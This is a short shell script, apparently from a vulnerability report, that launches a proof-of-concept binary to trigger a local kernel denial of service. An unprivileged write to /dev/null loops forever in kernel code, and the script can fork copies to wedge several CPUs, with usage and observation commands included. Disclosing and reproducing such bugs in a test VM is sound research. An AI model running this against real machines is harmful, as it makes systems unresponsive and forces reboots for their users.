#!/bin/sh
# DF-0079 run script. Demonstrates the infinite-loop DoS.
#
# Run as an UNPRIVILEGED user (maxx, uid 1001). /dev/null is mode 0666 so no
# privilege is required. The single write() below will NEVER return on a
# vulnerable kernel: it pegs one CPU at 100% in kernel (mmrw) forever and the
# process cannot be killed (only a reboot recovers). Each additional copy
# wedges another core.
#
# WARNING: this is a full-system local DoS. On a small guest it can make the
# machine unresponsive to ssh within ~1 second. Run in a disposable VM and
# hard-reset afterwards.
#
# Usage:
#   ./run.sh            # wedge 1 CPU forever
#   ./run.sh 4          # fork 4 copies to wedge 4 CPUs
#
# To observe the wedged thread before it starves the box, run (as root, from
# another session, immediately) something like:
#   while true; do pgrep -n df0079 | xargs -r ps -o pid,stat,pcpu,cputime,args -p; sleep 0.2; done
# (or use the serial-console watcher watch_df0079.sh so output survives a reset).
cd "$(dirname "$0")"
N=${1:-1}
echo "DF-0079: launching $N wedge process(es) as uid=$(id -u) on /dev/null"
if [ "$N" -le 1 ]; then
    ./df0079          # never returns on a vulnerable kernel
else
    ./df0079 "$N"
fi
